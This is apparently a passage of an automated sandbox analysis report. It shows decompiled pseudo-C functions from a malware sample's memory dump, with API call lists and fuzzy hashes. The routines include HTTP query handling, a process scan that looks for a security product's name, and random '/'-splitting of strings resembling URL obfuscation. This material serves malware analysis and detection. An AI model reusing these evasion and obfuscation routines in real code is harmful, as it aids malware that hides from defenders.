                                                          					_v20 = _t34;
                                                          					if(_t34 != 0) {
                                                          						L3:
                                                          						_push( &_v16);
                                                          						_push( &_v8);
                                                          						_push(_t61 + 0x2c);
                                                          						_push(0x20000013);
                                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          						_v8 = 4;
                                                          						_v16 = 0;
                                                          						if( *_t60() == 0) {
                                                          							_t39 = GetLastError();
                                                          							_v12 = _t39;
                                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                          								L15:
                                                          								return _v12;
                                                          							} else {
                                                          								goto L11;
                                                          							}
                                                          						}
                                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                          							goto L11;
                                                          						} else {
                                                          							_v16 = 0;
                                                          							_v8 = 0;
                                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                          							_t58 = E04C0A71F(_v8 + 1);
                                                          							if(_t58 == 0) {
                                                          								_v12 = 8;
                                                          							} else {
                                                          								_push( &_v16);
                                                          								_push( &_v8);
                                                          								_push(_t58);
                                                          								_push(0x16);
                                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          								if( *_t60() == 0) {
                                                          									E04C0A734(_t58);
                                                          									_v12 = GetLastError();
                                                          								} else {
                                                          									 *((char*)(_t58 + _v8)) = 0;
                                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                          								}
                                                          							}
                                                          							goto L15;
                                                          						}
                                                          					}
                                                          					SetEvent( *(_t61 + 0x1c));
                                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                          					_v12 = _t56;
                                                          					if(_t56 != 0) {
                                                          						goto L15;
                                                          					}
                                                          					goto L3;
                                                          					L11:
                                                          					_t42 = E04C05646( *(_t61 + 0x1c), _t59, 0xea60);
                                                          					_v12 = _t42;
                                                          				} while (_t42 == 0);
                                                          				goto L15;
                                                          			}
















                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04C09259
                                                          • SetEvent.KERNEL32(?), ref: 04C09269
                                                          • GetLastError.KERNEL32 ref: 04C092F2
                                                            • Part of subcall function 04C05646: WaitForMultipleObjects.KERNEL32(00000002,04C0A8E3,00000000,04C0A8E3,?,?,?,04C0A8E3,0000EA60), ref: 04C05661
                                                            • Part of subcall function 04C0A734: HeapFree.KERNEL32(00000000,00000000,04C05637,00000000,?,?,00000000), ref: 04C0A740
                                                          • GetLastError.KERNEL32(00000000), ref: 04C09327
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: bcc43efcb3b653d774ad02d4ba3162c79a90e4148cad25aeea59fea912e9a754
                                                          • Instruction ID: a39d12b1ce59ebf65c87ba97874735ddd9d7e75852cb3be2e8d61094ca8619f4
                                                          • Opcode Fuzzy Hash: bcc43efcb3b653d774ad02d4ba3162c79a90e4148cad25aeea59fea912e9a754
                                                          • Instruction Fuzzy Hash: 55310EB5900309EFDB20DFA5C884AAEB7B9EB08304F10C96AE542E2191D775AB44DF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 40%
                                                          			E04C036B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                          				intOrPtr _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				char _v32;
                                                          				void* __esi;
                                                          				void* _t29;
                                                          				void* _t38;
                                                          				signed int* _t39;
                                                          				void* _t40;
                                                          
                                                          				_t36 = __ecx;
                                                          				_v32 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v12 = _a4;
                                                          				_t38 = E04C03BB9(__ecx,  &_v32);
                                                          				if(_t38 != 0) {
                                                          					L12:
                                                          					_t39 = _a8;
                                                          					L13:
                                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                          						_t16 =  &(_t39[1]); // 0x5
                                                          						_t23 = _t16;
                                                          						if( *_t16 != 0) {
                                                          							E04C04F79(_t23);
                                                          						}
                                                          					}
                                                          					return _t38;
                                                          				}
                                                          				if(E04C0A2F9(0x40,  &_v16) != 0) {
                                                          					_v16 = 0;
                                                          				}
                                                          				_t40 = CreateEventA(0x4c0d2ac, 1, 0,  *0x4c0d344);
                                                          				if(_t40 != 0) {
                                                          					SetEvent(_t40);
                                                          					Sleep(0xbb8);
                                                          					CloseHandle(_t40);
                                                          				}
                                                          				_push( &_v32);
                                                          				if(_a12 == 0) {
                                                          					_t29 = E04C0A446(_t36);
                                                          				} else {
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t29 = E04C0853F(_t36);
                                                          				}
                                                          				_t41 = _v16;
                                                          				_t38 = _t29;
                                                          				if(_v16 != 0) {
                                                          					E04C04F14(_t41);
                                                          				}
                                                          				if(_t38 != 0) {
                                                          					goto L12;
                                                          				} else {
                                                          					_t39 = _a8;
                                                          					_t38 = E04C011EE( &_v32, _t39);
                                                          					goto L13;
                                                          				}
                                                          			}













                                                          APIs
                                                          • CreateEventA.KERNEL32(04C0D2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,04C052AA,?,00000001,?), ref: 04C03702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,04C052AA,?,00000001,?,00000002,?,?,04C05D5E,?), ref: 04C0370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,04C052AA,?,00000001,?,00000002,?,?,04C05D5E,?), ref: 04C0371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,04C052AA,?,00000001,?,00000002,?,?,04C05D5E,?), ref: 04C03721
                                                            • Part of subcall function 04C0A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,04C03741,?,04C03741,?,?,?,?,?,04C03741,?), ref: 04C0A520
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: 3c90dd86cdd04e94373b3c19f0ff4c682b5e94e6bc07ffef7f6ee9e1636b39f6
                                                          • Instruction ID: b61da9c434276189d3ec726716eefb52fccf2058d3fc643abba9a16203e98f25
                                                          • Opcode Fuzzy Hash: 3c90dd86cdd04e94373b3c19f0ff4c682b5e94e6bc07ffef7f6ee9e1636b39f6
                                                          • Instruction Fuzzy Hash: C221DAB6D00259ABDB10BFE989849AEB37EEB04354B05C425EE11E7190D734BA84CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E04C06545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                          				intOrPtr _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				intOrPtr _t26;
                                                          				intOrPtr* _t28;
                                                          				intOrPtr _t31;
                                                          				intOrPtr* _t32;
                                                          				void* _t39;
                                                          				int _t46;
                                                          				intOrPtr* _t47;
                                                          				int _t48;
                                                          
                                                          				_t47 = __eax;
                                                          				_push( &_v12);
                                                          				_push(__eax);
                                                          				_t39 = 0;
                                                          				_t46 = 0;
                                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                          				_v8 = _t26;
                                                          				if(_t26 < 0) {
                                                          					L13:
                                                          					return _v8;
                                                          				}
                                                          				if(_v12 == 0) {
                                                          					Sleep(0xc8);
                                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                          				}
                                                          				if(_v8 >= _t39) {
                                                          					_t28 = _v12;
                                                          					if(_t28 != 0) {
                                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                          						_v8 = _t31;
                                                          						if(_t31 >= 0) {
                                                          							_t46 = lstrlenW(_v16);
                                                          							if(_t46 != 0) {
                                                          								_t46 = _t46 + 1;
                                                          								_t48 = _t46 + _t46;
                                                          								_t39 = E04C0A71F(_t48);
                                                          								if(_t39 == 0) {
                                                          									_v8 = 0x8007000e;
                                                          								} else {
                                                          									memcpy(_t39, _v16, _t48);
                                                          								}
                                                          								__imp__#6(_v16);
                                                          							}
                                                          						}
                                                          						_t32 = _v12;
                                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                          					}
                                                          					 *_a4 = _t39;
                                                          					 *_a8 = _t46 + _t46;
                                                          				}
                                                          				goto L13;
                                                          			}















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: a7e6e4765501be1338ce68182f18c84dd789d72fce95e1f5361584bafe3ce77a
                                                          • Instruction ID: 27671b846ff493bc4773af6120eadf3d5cc45583fd2aefefc050b657c78ac7ce
                                                          • Opcode Fuzzy Hash: a7e6e4765501be1338ce68182f18c84dd789d72fce95e1f5361584bafe3ce77a
                                                          • Instruction Fuzzy Hash: 59218079A00219EFDB11DFA8C88499EBBF9FF58304B108169E906E7244EB30EB51DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E04C017E5(unsigned int __eax, void* __ecx) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				signed int _t21;
                                                          				signed short _t23;
                                                          				char* _t27;
                                                          				void* _t29;
                                                          				void* _t30;
                                                          				unsigned int _t33;
                                                          				void* _t37;
                                                          				unsigned int _t38;
                                                          				void* _t41;
                                                          				void* _t42;
                                                          				int _t45;
                                                          				void* _t46;
                                                          
                                                          				_t42 = __eax;
                                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                          				_t38 = __eax;
                                                          				_t30 = RtlAllocateHeap( *0x4c0d238, 0, (__eax >> 3) + __eax + 1);
                                                          				_v12 = _t30;
                                                          				if(_t30 != 0) {
                                                          					_v8 = _t42;
                                                          					do {
                                                          						_t33 = 0x18;
                                                          						if(_t38 <= _t33) {
                                                          							_t33 = _t38;
                                                          						}
                                                          						_t21 =  *0x4c0d250; // 0x0
                                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                          						 *0x4c0d250 = _t23;
                                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                          						memcpy(_t30, _v8, _t45);
                                                          						_v8 = _v8 + _t45;
                                                          						_t27 = _t30 + _t45;
                                                          						_t38 = _t38 - _t45;
                                                          						_t46 = _t46 + 0xc;
                                                          						 *_t27 = 0x2f;
                                                          						_t13 = _t27 + 1; // 0x1
                                                          						_t30 = _t13;
                                                          					} while (_t38 > 8);
                                                          					memcpy(_t30, _v8, _t38 + 1);
                                                          				}
                                                          				return _v12;
                                                          			}


















                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04C01C49,00000000,?,?,04C020C2,?,068895B0), ref: 04C017F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04C01808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04C01C49,00000000,?,?,04C020C2,?,068895B0), ref: 04C0184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 04C0186D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: fc84d7c4e63fb24f8cc959b04aabdf37f95848aa84283f7034f252b540a29f88
                                                          • Instruction ID: 41c69ea68de17f6a64f39c7a556782d59401d0f6ee221080e6493f3438f68f86
                                                          • Opcode Fuzzy Hash: fc84d7c4e63fb24f8cc959b04aabdf37f95848aa84283f7034f252b540a29f88
                                                          • Instruction Fuzzy Hash: 9E110676A00114AFD7148FA9DC84EAEBBEEEB80360B064276F5059B180EB749E40C7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E04C0486F(char* __eax) {
                                                          				char* _t8;
                                                          				intOrPtr _t12;
                                                          				char* _t21;
                                                          				signed int _t23;
                                                          				char* _t24;
                                                          				signed int _t26;
                                                          				void* _t27;
                                                          
                                                          				_t21 = __eax;
                                                          				_push(0x20);
                                                          				_t23 = 1;
                                                          				_push(__eax);
                                                          				while(1) {
                                                          					_t8 = StrChrA();
                                                          					if(_t8 == 0) {
                                                          						break;
                                                          					}
                                                          					_t23 = _t23 + 1;
                                                          					_push(0x20);
                                                          					_push( &(_t8[1]));
                                                          				}
                                                          				_t12 = E04C0A71F(_t23 << 2);
                                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                          				if(_t12 != 0) {
                                                          					StrTrimA(_t21, 0x4c0c284);
                                                          					_t26 = 0;
                                                          					do {
                                                          						_t24 = StrChrA(_t21, 0x20);
                                                          						if(_t24 != 0) {
                                                          							 *_t24 = 0;
                                                          							_t24 =  &(_t24[1]);
                                                          							StrTrimA(_t24, 0x4c0c284);
                                                          						}
                                                          						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                          						_t26 = _t26 + 1;
                                                          						_t21 = _t24;
                                                          					} while (_t24 != 0);
                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                          				}
                                                          				return 0;
                                                          			}











                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,068895AC,?,04C05D25,?,04C0243F,068895AC,?,04C05D25), ref: 04C04889
                                                          • StrTrimA.SHLWAPI(?,04C0C284,00000002,?,04C05D25,?,04C0243F,068895AC,?,04C05D25), ref: 04C048A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,04C05D25,?,04C0243F,068895AC,?,04C05D25), ref: 04C048B3
                                                          • StrTrimA.SHLWAPI(00000001,04C0C284,?,04C05D25,?,04C0243F,068895AC,?,04C05D25), ref: 04C048C5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: ef2437a08f08416cfd106b5462f76682eb334ed84f05992e5c49fa90191012cc
                                                          • Instruction ID: d9df48db7513d1ad6972d4c8db4c3b7a4018fb1344dd8d145ba2a08c5cf431f9
                                                          • Opcode Fuzzy Hash: ef2437a08f08416cfd106b5462f76682eb334ed84f05992e5c49fa90191012cc
                                                          • Instruction Fuzzy Hash: EB012875601352AFD2349F6A8C48F37BF9DFB45A64F118B18FA42C7280EB60E80196E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E04C0A65C() {
                                                          				char _v264;
                                                          				void* _v300;
                                                          				int _t8;
                                                          				intOrPtr _t9;
                                                          				int _t15;
                                                          				void* _t17;
                                                          
                                                          				_t15 = 0;
                                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                          				if(_t17 != 0) {
                                                          					_t8 = Process32First(_t17,  &_v300);
                                                          					while(_t8 != 0) {
                                                          						_t9 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          						_t2 = _t9 + 0x4c0ee34; // 0x73617661
                                                          						_push( &_v264);
                                                          						if( *0x4c0d0fc() != 0) {
                                                          							_t15 = 1;
                                                          						} else {
                                                          							_t8 = Process32Next(_t17,  &_v300);
                                                          							continue;
                                                          						}
                                                          						L7:
                                                          						CloseHandle(_t17);
                                                          						goto L8;
                                                          					}
                                                          					goto L7;
                                                          				}
                                                          				L8:
                                                          				return _t15;
                                                          			}










                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04C0A66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 04C0A67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 04C0A6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 04C0A6BA
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: 31391a27aa63fc6630b7ff4fc8699c14f16bee27d78396554578284d86be7247
                                                          • Instruction ID: 719dacf02dd970789633be172438d80a9cb5695f9b553b5765b74fbdf1921644
                                                          • Opcode Fuzzy Hash: 31391a27aa63fc6630b7ff4fc8699c14f16bee27d78396554578284d86be7247
                                                          • Instruction Fuzzy Hash: 19F0BB362012246BE720BAA69C48EEF77BEDBC5314F058151E615D3180EE35EE858AB5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04C06840(void* __esi) {
                                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          
                                                          				_v4 = 0;
                                                          				memset(__esi, 0, 0x38);
                                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                                          				 *(__esi + 0x1c) = _t8;
                                                          				if(_t8 != 0) {
                                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                                          					 *(__esi + 0x20) = _t10;
                                                          					if(_t10 == 0) {
                                                          						CloseHandle( *(__esi + 0x1c));
                                                          					} else {
                                                          						_v4 = 1;
                                                          					}
                                                          				}
                                                          				return _v4;
                                                          			}







                                                          APIs
                                                          • memset.NTDLL ref: 04C0684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 04C06863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04C06870
                                                          • CloseHandle.KERNEL32(?), ref: 04C06882
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: 090987b5fef60ff590c7ce4d7810cedec451d80aadab16e54b79fd790f9a8e78
                                                          • Instruction ID: bd04692b9a39e3310421ffdde7183083522c57b7d4d9e455ff0f3e10ed7e872f
                                                          • Opcode Fuzzy Hash: 090987b5fef60ff590c7ce4d7810cedec451d80aadab16e54b79fd790f9a8e78
                                                          • Instruction Fuzzy Hash: 19F05EF52043087FD3246F26DCC4C27BBADEB9129DB128B2EF14282151D676A9598B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E04C023F4(void** __esi) {
                                                          				char* _v0;
                                                          				intOrPtr _t4;
                                                          				intOrPtr _t6;
                                                          				void* _t8;
                                                          				intOrPtr _t11;
                                                          				void* _t12;
                                                          				void** _t14;
                                                          
                                                          				_t14 = __esi;
                                                          				_t4 =  *0x4c0d32c; // 0x68895b0
                                                          				__imp__(_t4 + 0x40);
                                                          				while(1) {
                                                          					_t6 =  *0x4c0d32c; // 0x68895b0
                                                          					_t1 = _t6 + 0x58; // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t8 =  *_t14;
                                                          				if(_t8 != 0 && _t8 != 0x4c0d030) {
                                                          					HeapFree( *0x4c0d238, 0, _t8);
                                                          				}
                                                          				_t14[1] = E04C0486F(_v0, _t14);
                                                          				_t11 =  *0x4c0d32c; // 0x68895b0
                                                          				_t12 = _t11 + 0x40;
                                                          				__imp__(_t12);
                                                          				return _t12;
                                                          			}











                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(06889570), ref: 04C023FD
                                                          • Sleep.KERNEL32(0000000A,?,04C05D25), ref: 04C02407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04C05D25), ref: 04C0242F
                                                          • RtlLeaveCriticalSection.NTDLL(06889570), ref: 04C0244B
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 3905e6a5c7754a59aa2bf47c0a289368c4aee750607ed87493a8d2e1baf4c86d
                                                          • Instruction ID: a56d85aac37720e2c0f4a5a94a42b1a14f3be27094f0f951cbe8e6fc9aea9a99
                                                          • Opcode Fuzzy Hash: 3905e6a5c7754a59aa2bf47c0a289368c4aee750607ed87493a8d2e1baf4c86d
                                                          • Instruction Fuzzy Hash: A2F058786042409BE7289FE8E888F2A77F9EF08748B46C500F643C6290C738EC84CB25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04C01B42() {
                                                          				void* _t1;
                                                          				intOrPtr _t5;
                                                          				void* _t6;
                                                          				void* _t7;
                                                          				void* _t11;
                                                          
                                                          				_t1 =  *0x4c0d26c; // 0x31c
                                                          				if(_t1 == 0) {
                                                          					L8:
                                                          					return 0;
                                                          				}
                                                          				SetEvent(_t1);
                                                          				_t11 = 0x7fffffff;
                                                          				while(1) {
                                                          					SleepEx(0x64, 1);
                                                          					_t5 =  *0x4c0d2bc; // 0x0
                                                          					if(_t5 == 0) {
                                                          						break;
                                                          					}
                                                          					_t11 = _t11 - 0x64;
                                                          					if(_t11 > 0) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				_t6 =  *0x4c0d26c; // 0x31c
                                                          				if(_t6 != 0) {
                                                          					CloseHandle(_t6);
                                                          				}
                                                          				_t7 =  *0x4c0d238; // 0x6490000
                                                          				if(_t7 != 0) {
                                                          					HeapDestroy(_t7);
                                                          				}
                                                          				goto L8;
                                                          			}









                                                          APIs
                                                          • SetEvent.KERNEL32(0000031C,00000001,04C04F0E), ref: 04C01B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04C01B5C
                                                          • CloseHandle.KERNEL32(0000031C), ref: 04C01B7D
                                                          • HeapDestroy.KERNEL32(06490000), ref: 04C01B8D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E04C06702() {
                                                          				void* _v0;
                                                          				void** _t3;
                                                          				void** _t5;
                                                          				void** _t7;
                                                          				void** _t8;
                                                          				void* _t10;
                                                          
                                                          				_t3 =  *0x4c0d32c; // 0x68895b0
                                                          				__imp__( &(_t3[0x10]));
                                                          				while(1) {
                                                          					_t5 =  *0x4c0d32c; // 0x68895b0
                                                          					_t1 =  &(_t5[0x16]); // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t7 =  *0x4c0d32c; // 0x68895b0
                                                          				_t10 =  *_t7;
                                                          				if(_t10 != 0 && _t10 != 0x4c0e81a) {
                                                          					HeapFree( *0x4c0d238, 0, _t10);
                                                          					_t7 =  *0x4c0d32c; // 0x68895b0
                                                          				}
                                                          				 *_t7 = _v0;
                                                          				_t8 =  &(_t7[0x10]);
                                                          				__imp__(_t8);
                                                          				return _t8;
                                                          			}










                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(06889570), ref: 04C0670B
                                                          • Sleep.KERNEL32(0000000A,?,04C05D25), ref: 04C06715
                                                          • HeapFree.KERNEL32(00000000,?,?,04C05D25), ref: 04C06743
                                                          • RtlLeaveCriticalSection.NTDLL(06889570), ref: 04C06758
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E04C05AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                          				intOrPtr* _v8;
                                                          				void* _t17;
                                                          				intOrPtr* _t22;
                                                          				void* _t27;
                                                          				char* _t30;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				void* _t36;
                                                          				void* _t37;
                                                          				void* _t39;
                                                          				int _t42;
                                                          
                                                          				_t17 = __eax;
                                                          				_t37 = 0;
                                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                          				_t2 = _t17 + 1; // 0x1
                                                          				_t28 = _t2;
                                                          				_t34 = E04C0A71F(_t2);
                                                          				if(_t34 != 0) {
                                                          					_t30 = E04C0A71F(_t28);
                                                          					if(_t30 == 0) {
                                                          						E04C0A734(_t34);
                                                          					} else {
                                                          						_t39 = _a4;
                                                          						_t22 = E04C0A782(_t39);
                                                          						_v8 = _t22;
                                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                          							_a4 = _t39;
                                                          						} else {
                                                          							_t26 = _t22 + 2;
                                                          							_a4 = _t22 + 2;
                                                          							_t22 = E04C0A782(_t26);
                                                          							_v8 = _t22;
                                                          						}
                                                          						if(_t22 == 0) {
                                                          							__imp__(_t34, _a4);
                                                          							 *_t30 = 0x2f;
                                                          							 *((char*)(_t30 + 1)) = 0;
                                                          						} else {
                                                          							_t42 = _t22 - _a4;
                                                          							memcpy(_t34, _a4, _t42);
